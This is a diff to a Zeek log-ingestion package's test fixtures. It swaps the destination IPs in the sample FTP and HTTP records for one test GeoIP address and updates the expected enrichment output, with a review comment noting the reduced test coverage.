"{\"ts\":1187379105.01948,\"uid\":\"CpQoCn3o28tke89zv9\",\"id.orig_h\":\"192.168.1.182\",\"id.orig_p\":62014,\"id.resp_h\":\"192.168.1.231\",\"id.resp_p\":21,\"user\":\"ftp\",\"password\":\"ftp\",\"command\":\"RETR\",\"arg\":\"ftp://192.168.1.231/resume.doc\",\"file_size\":39424,\"reply_code\":226,\"reply_msg\":\"Transfer complete.\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -184,7 +184,7 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:27.615424800Z", + "ingested": "2021-12-09T13:51:01.440355400Z", "original": "{\"ts\":1187379117.579203,\"uid\":\"CpQoCn3o28tke89zv9\",\"id.orig_h\":\"192.168.1.182\",\"id.orig_p\":62014,\"id.resp_h\":\"192.168.1.231\",\"id.resp_p\":21,\"user\":\"ftp\",\"password\":\"ftp\",\"command\":\"STOR\",\"arg\":\"ftp://192.168.1.231/uploads/README\",\"reply_code\":226,\"reply_msg\":\"Transfer complete.\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -257,7 +257,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:27.615432500Z", + "ingested": "2021-12-09T13:51:01.440358800Z", "original": "{\"ts\":1187379117.579203,\"uid\":\"CpQoCn3o28tke89zv9\",\"id.orig_h\":\"192.168.1.182\",\"id.orig_p\":62014,\"id.resp_h\":\"192.168.1.231\",\"id.resp_p\":21,\"user\":\"ftp\",\"password\":\"ftp\",\"command\":\"STOR\",\"arg\":\"ftp://192.168.1.231/uploads/README\",\"reply_code\":226,\"reply_msg\":\"Transfer complete.\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log b/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log index 8183a7443d7..8f44674919d 100644 --- a/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log +++ b/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log 
@@ -1,8 +1,8 @@
-{"ts":1547687130.172944,"uid":"CCNp8v1SNzY7v9d1Ih","id.orig_h":"10.178.98.102","id.orig_p":62995,"id.resp_h":"17.253.5.203","username":"user","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.apple.com","uri":"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=","version":"1.1","user_agent":"com.apple.trustd/2.0","request_body_len":0,"response_body_len":3735,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F5zuip1tSwASjNAHy7"],"resp_mime_types":["application/ocsp-response"]}
-{"ts":1547707019.757479,"uid":"CMnIaR2V8VXyu7EPs","id.orig_h":"10.20.8.197","id.orig_p":35684,"id.resp_h":"34.206.130.40","id.resp_p":80,"trans_depth":1,"method":"GET","host":"httpbin.org","uri":"/ip","version":"1.1","user_agent":"curl/7.58.0","request_body_len":0,"response_body_len":32,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FwGPlr1GcKUWWdkXoi"],"resp_mime_types":["text/json"]}
-{"ts":1617081354.277591,"uid":"CdqHhA1AsxBIjmVZ9","id.orig_h":"10.156.0.2","id.orig_p":57896,"id.resp_h":"23.55.163.58","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FM01o54RU9pez8AJba"],"resp_mime_types":["application/ocsp-response"]}
-{"ts":1617081355.599548,"uid":"CxhRTwkHNRsHxBw34","id.orig_h":"10.156.0.2","id.orig_p":55378,"id.resp_h":"52.53.69.85","id.resp_p":80,"trans_depth":1,"version":"1.1","request_body_len":0,"response_body_len":191,"status_code":301,"status_msg":"Moved Permanently","tags":[],"resp_fuids":["FVGTq31RBgKGE02hx7"],"resp_mime_types":["text/html"]}
-{"ts":1617081360.171904,"uid":"CrI5Xg30caNXnNvEse","id.orig_h":"10.156.0.2","id.orig_p":41960,"id.resp_h":"23.55.163.48","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F8vozz46VoxeAmqLv3"],"resp_mime_types":["application/ocsp-response"]}
-{"ts":1617081364.250251,"uid":"C6oCGd24yB2dZ7y7z7","id.orig_h":"10.156.0.2","id.orig_p":42164,"id.resp_h":"23.55.163.48","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F1imAq4yUjbwyK7NO2"],"resp_mime_types":["application/ocsp-response"]}
-{"ts":1617081366.285075,"uid":"C7DWRE1zsvxUK9RyW1","id.orig_h":"10.156.0.2","id.orig_p":42292,"id.resp_h":"23.55.163.48","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FQhm6z1cISaOxMzzR6"],"resp_mime_types":["application/ocsp-response"]}
-{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1547707019.757479,\"uid\":\"CMnIaR2V8VXyu7EPs\",\"id.orig_h\":\"10.20.8.197\",\"id.orig_p\":35684,\"id.resp_h\":\"34.206.130.40\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"httpbin.org\",\"uri\":\"/ip\",\"version\":\"1.1\",\"user_agent\":\"curl/7.58.0\",\"request_body_len\":0,\"response_body_len\":32,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FwGPlr1GcKUWWdkXoi\"],\"resp_mime_types\":[\"text/json\"]}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/http.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}}
+{"ts":1547687130.172944,"uid":"CCNp8v1SNzY7v9d1Ih","id.orig_h":"10.178.98.102","id.orig_p":62995,"id.resp_h":"89.160.20.156","username":"user","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.apple.com","uri":"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=","version":"1.1","user_agent":"com.apple.trustd/2.0","request_body_len":0,"response_body_len":3735,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F5zuip1tSwASjNAHy7"],"resp_mime_types":["application/ocsp-response"]}
+{"ts":1547707019.757479,"uid":"CMnIaR2V8VXyu7EPs","id.orig_h":"10.20.8.197","id.orig_p":35684,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"method":"GET","host":"httpbin.org","uri":"/ip","version":"1.1","user_agent":"curl/7.58.0","request_body_len":0,"response_body_len":32,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FwGPlr1GcKUWWdkXoi"],"resp_mime_types":["text/json"]}
+{"ts":1617081354.277591,"uid":"CdqHhA1AsxBIjmVZ9","id.orig_h":"10.156.0.2","id.orig_p":57896,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FM01o54RU9pez8AJba"],"resp_mime_types":["application/ocsp-response"]}
+{"ts":1617081355.599548,"uid":"CxhRTwkHNRsHxBw34","id.orig_h":"10.156.0.2","id.orig_p":55378,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.1","request_body_len":0,"response_body_len":191,"status_code":301,"status_msg":"Moved Permanently","tags":[],"resp_fuids":["FVGTq31RBgKGE02hx7"],"resp_mime_types":["text/html"]}
+{"ts":1617081360.171904,"uid":"CrI5Xg30caNXnNvEse","id.orig_h":"10.156.0.2","id.orig_p":41960,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F8vozz46VoxeAmqLv3"],"resp_mime_types":["application/ocsp-response"]}
+{"ts":1617081364.250251,"uid":"C6oCGd24yB2dZ7y7z7","id.orig_h":"10.156.0.2","id.orig_p":42164,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F1imAq4yUjbwyK7NO2"],"resp_mime_types":["application/ocsp-response"]}
+{"ts":1617081366.285075,"uid":"C7DWRE1zsvxUK9RyW1","id.orig_h":"10.156.0.2","id.orig_p":42292,"id.resp_h":"89.160.20.156","id.resp_p":80,"trans_depth":1,"version":"1.0","request_body_len":0,"response_body_len":503,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FQhm6z1cISaOxMzzR6"],"resp_mime_types":["application/ocsp-response"]}
+{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1547707019.757479,\"uid\":\"CMnIaR2V8VXyu7EPs\",\"id.orig_h\":\"10.20.8.197\",\"id.orig_p\":35684,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"httpbin.org\",\"uri\":\"/ip\",\"version\":\"1.1\",\"user_agent\":\"curl/7.58.0\",\"request_body_len\":0,\"response_body_len\":32,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FwGPlr1GcKUWWdkXoi\"],\"resp_mime_types\":[\"text/json\"]}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/http.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}}
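Review bot: Replacing six different `id.resp_h` values with the single address `89.160.20.156` in every record shrinks what this fixture exercises: the previous expected output covered both a full city/region GeoIP result and a country-only one (the `23.55.163.x` rows carried no `city_name` or `region_iso_code`), plus a distinct `network.community_id` per flow, whereas after this hunk all seven events enrich to the same geo, ASN and address. If the test GeoIP database supports more than one address, giving at least one row a second supported address would keep the missing-field path and the per-flow hash check covered; as written, a pipeline regression that enriched every destination identically would be harder to catch. The first record also now pairs `"host":"ocsp.apple.com"` and a `com.apple.trustd` user agent with a destination that the expected file resolves to Bredband2 AB, which is harmless for the pipeline test but misleading as sample data. The same single-address collapse applies to the test-intel.log and test-irc.log hunks below.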
diff --git a/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log-expected.json b/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log-expected.json index ed0877afaa9..9a21b7521e5 100644 --- a/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log-expected.json +++ b/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log-expected.json @@ -3,26 +3,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "San Jose", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -121.8914, - "lat": 37.3388 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 6185, + "number": 29518, "organization": { - "name": "Apple Inc." + "name": "Bredband2 AB" } }, - "address": "17.253.5.203", + "address": "89.160.20.156", "port": 80, - "ip": "17.253.5.203" + "ip": "89.160.20.156" }, "zeek": { "http": { @@ -53,7 +53,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:dtBPRfpKEZyg1iOHss95buwv+cw=", + "community_id": "1:TXs3dhUTv+gqBJnP8SIFZaOWpyM=", "transport": "tcp" }, "@timestamp": "2019-01-17T01:05:30.172Z", @@ -66,7 +66,7 @@ ], "ip": [ "10.178.98.102", - "17.253.5.203" + "89.160.20.156" ] }, "http": { 
@@ -85,8 +85,8 @@ } }, "event": { - "ingested": "2021-08-11T19:18:28.259576900Z", - "original": "{\"ts\":1547687130.172944,\"uid\":\"CCNp8v1SNzY7v9d1Ih\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":62995,\"id.resp_h\":\"17.253.5.203\",\"username\":\"user\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"ocsp.apple.com\",\"uri\":\"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=\",\"version\":\"1.1\",\"user_agent\":\"com.apple.trustd/2.0\",\"request_body_len\":0,\"response_body_len\":3735,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F5zuip1tSwASjNAHy7\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", + "ingested": "2021-12-09T13:51:01.993412400Z", + "original": "{\"ts\":1547687130.172944,\"uid\":\"CCNp8v1SNzY7v9d1Ih\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":62995,\"id.resp_h\":\"89.160.20.156\",\"username\":\"user\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"ocsp.apple.com\",\"uri\":\"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=\",\"version\":\"1.1\",\"user_agent\":\"com.apple.trustd/2.0\",\"request_body_len\":0,\"response_body_len\":3735,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F5zuip1tSwASjNAHy7\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "get", 
@@ -116,26 +116,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 14618, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "address": "34.206.130.40", + "address": "89.160.20.156", "port": 80, - "ip": "34.206.130.40" + "ip": "89.160.20.156" }, "zeek": { "http": { @@ -165,7 +165,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Ol0Btm49e1mxnu/BXm1GM8w5ixY=", + "community_id": "1:61UpXAOHdoCqwl0IE7pv7Zrqgig=", "transport": "tcp" }, "@timestamp": "2019-01-17T06:36:59.757Z", @@ -175,7 +175,7 @@ "related": { "ip": [ "10.20.8.197", - "34.206.130.40" + "89.160.20.156" ] }, "http": { 
@@ -194,8 +194,8 @@ } }, "event": { - "ingested": "2021-08-11T19:18:28.259587100Z", - "original": "{\"ts\":1547707019.757479,\"uid\":\"CMnIaR2V8VXyu7EPs\",\"id.orig_h\":\"10.20.8.197\",\"id.orig_p\":35684,\"id.resp_h\":\"34.206.130.40\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"httpbin.org\",\"uri\":\"/ip\",\"version\":\"1.1\",\"user_agent\":\"curl/7.58.0\",\"request_body_len\":0,\"response_body_len\":32,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FwGPlr1GcKUWWdkXoi\"],\"resp_mime_types\":[\"text/json\"]}", + "ingested": "2021-12-09T13:51:01.993421500Z", + "original": "{\"ts\":1547707019.757479,\"uid\":\"CMnIaR2V8VXyu7EPs\",\"id.orig_h\":\"10.20.8.197\",\"id.orig_p\":35684,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"httpbin.org\",\"uri\":\"/ip\",\"version\":\"1.1\",\"user_agent\":\"curl/7.58.0\",\"request_body_len\":0,\"response_body_len\":32,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FwGPlr1GcKUWWdkXoi\"],\"resp_mime_types\":[\"text/json\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "get", @@ -223,23 +223,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 35994, + "number": 29518, "organization": { - "name": "Akamai Technologies, Inc." + "name": "Bredband2 AB" } }, - "address": "23.55.163.58", + "address": "89.160.20.156", "port": 80, - "ip": "23.55.163.58" + "ip": "89.160.20.156" }, "zeek": { "http": { 
@@ -264,7 +267,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:6EkQLym56b7e/6iC17geVW5hAWc=", + "community_id": "1:Va3F0U8tWSumaLfdIthiogJqVoM=", "transport": "tcp" }, "@timestamp": "2021-03-30T05:15:54.277Z", @@ -274,7 +277,7 @@ "related": { "ip": [ "10.156.0.2", - "23.55.163.58" + "89.160.20.156" ] }, "http": { @@ -292,8 +295,8 @@ } }, "event": { - "ingested": "2021-08-11T19:18:28.259593200Z", - "original": "{\"ts\":1617081354.277591,\"uid\":\"CdqHhA1AsxBIjmVZ9\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":57896,\"id.resp_h\":\"23.55.163.58\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FM01o54RU9pez8AJba\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", + "ingested": "2021-12-09T13:51:01.993427600Z", + "original": "{\"ts\":1617081354.277591,\"uid\":\"CdqHhA1AsxBIjmVZ9\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":57896,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FM01o54RU9pez8AJba\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CdqHhA1AsxBIjmVZ9", 
@@ -312,26 +315,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "San Jose", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -121.8914, - "lat": 37.3388 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 16509, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "address": "52.53.69.85", + "address": "89.160.20.156", "port": 80, - "ip": "52.53.69.85" + "ip": "89.160.20.156" }, "zeek": { "http": { @@ -356,7 +359,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:DCTMm9iJ3zprWF+EMbM+Kzz2G/g=", + "community_id": "1:WGP7lVikdNxSruwUqKr9UJsM6cg=", "transport": "tcp" }, "@timestamp": "2021-03-30T05:15:55.599Z", @@ -366,7 +369,7 @@ "related": { "ip": [ "10.156.0.2", - "52.53.69.85" + "89.160.20.156" ] }, "http": { 
@@ -384,8 +387,8 @@ } }, "event": { - "ingested": "2021-08-11T19:18:28.259599Z", - "original": "{\"ts\":1617081355.599548,\"uid\":\"CxhRTwkHNRsHxBw34\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":55378,\"id.resp_h\":\"52.53.69.85\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.1\",\"request_body_len\":0,\"response_body_len\":191,\"status_code\":301,\"status_msg\":\"Moved Permanently\",\"tags\":[],\"resp_fuids\":[\"FVGTq31RBgKGE02hx7\"],\"resp_mime_types\":[\"text/html\"]}", + "ingested": "2021-12-09T13:51:01.993433500Z", + "original": "{\"ts\":1617081355.599548,\"uid\":\"CxhRTwkHNRsHxBw34\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":55378,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.1\",\"request_body_len\":0,\"response_body_len\":191,\"status_code\":301,\"status_msg\":\"Moved Permanently\",\"tags\":[],\"resp_fuids\":[\"FVGTq31RBgKGE02hx7\"],\"resp_mime_types\":[\"text/html\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CxhRTwkHNRsHxBw34", @@ -404,23 +407,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 35994, + "number": 29518, "organization": { - "name": "Akamai Technologies, Inc." + "name": "Bredband2 AB" } }, - "address": "23.55.163.48", + "address": "89.160.20.156", "port": 80, - "ip": "23.55.163.48" + "ip": "89.160.20.156" }, "zeek": { "http": { @@ -445,7 +451,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:341n70GKTc+se6UT8lXgjnHVXXo=", + "community_id": "1:/5C96eJFQOtyIA58kKSJqNHqFag=", "transport": "tcp" }, "@timestamp": "2021-03-30T05:16:00.171Z", 
@@ -455,7 +461,7 @@ "related": { "ip": [ "10.156.0.2", - "23.55.163.48" + "89.160.20.156" ] }, "http": { @@ -473,8 +479,8 @@ } }, "event": { - "ingested": "2021-08-11T19:18:28.259605600Z", - "original": "{\"ts\":1617081360.171904,\"uid\":\"CrI5Xg30caNXnNvEse\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":41960,\"id.resp_h\":\"23.55.163.48\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F8vozz46VoxeAmqLv3\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", + "ingested": "2021-12-09T13:51:01.993439400Z", + "original": "{\"ts\":1617081360.171904,\"uid\":\"CrI5Xg30caNXnNvEse\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":41960,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F8vozz46VoxeAmqLv3\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CrI5Xg30caNXnNvEse", @@ -493,23 +499,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 35994, + "number": 29518, "organization": { - "name": "Akamai Technologies, Inc." + "name": "Bredband2 AB" } }, - "address": "23.55.163.48", + "address": "89.160.20.156", "port": 80, - "ip": "23.55.163.48" + "ip": "89.160.20.156" }, "zeek": { "http": { 
@@ -534,7 +543,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:82rJ/b6SdSbZMEALyu9kigb2Os0=", + "community_id": "1:BZ8++u2MIGSTzB1PMApm+Z7ySCw=", "transport": "tcp" }, "@timestamp": "2021-03-30T05:16:04.250Z", @@ -544,7 +553,7 @@ "related": { "ip": [ "10.156.0.2", - "23.55.163.48" + "89.160.20.156" ] }, "http": { @@ -562,8 +571,8 @@ } }, "event": { - "ingested": "2021-08-11T19:18:28.259614400Z", - "original": "{\"ts\":1617081364.250251,\"uid\":\"C6oCGd24yB2dZ7y7z7\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":42164,\"id.resp_h\":\"23.55.163.48\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F1imAq4yUjbwyK7NO2\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", + "ingested": "2021-12-09T13:51:01.993445300Z", + "original": "{\"ts\":1617081364.250251,\"uid\":\"C6oCGd24yB2dZ7y7z7\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":42164,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F1imAq4yUjbwyK7NO2\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C6oCGd24yB2dZ7y7z7", 
@@ -582,23 +591,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 35994, + "number": 29518, "organization": { - "name": "Akamai Technologies, Inc." + "name": "Bredband2 AB" } }, - "address": "23.55.163.48", + "address": "89.160.20.156", "port": 80, - "ip": "23.55.163.48" + "ip": "89.160.20.156" }, "zeek": { "http": { @@ -623,7 +635,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:q4SzvspH9r4RpNUx+pCu9/vYYuQ=", + "community_id": "1:ajUcq0AI8azqE0a1li4/jRMwcKw=", "transport": "tcp" }, "@timestamp": "2021-03-30T05:16:06.285Z", @@ -633,7 +645,7 @@ "related": { "ip": [ "10.156.0.2", - "23.55.163.48" + "89.160.20.156" ] }, "http": { 
@@ -651,8 +663,8 @@ } }, "event": { - "ingested": "2021-08-11T19:18:28.259620800Z", - "original": "{\"ts\":1617081366.285075,\"uid\":\"C7DWRE1zsvxUK9RyW1\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":42292,\"id.resp_h\":\"23.55.163.48\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FQhm6z1cISaOxMzzR6\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", + "ingested": "2021-12-09T13:51:01.993451200Z", + "original": "{\"ts\":1617081366.285075,\"uid\":\"C7DWRE1zsvxUK9RyW1\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":42292,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FQhm6z1cISaOxMzzR6\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C7DWRE1zsvxUK9RyW1", @@ -676,26 +688,26 @@ }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 14618, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "address": "34.206.130.40", + "address": "89.160.20.156", "port": 80, - "ip": "34.206.130.40" + "ip": "89.160.20.156" }, "zeek": { "http": { 
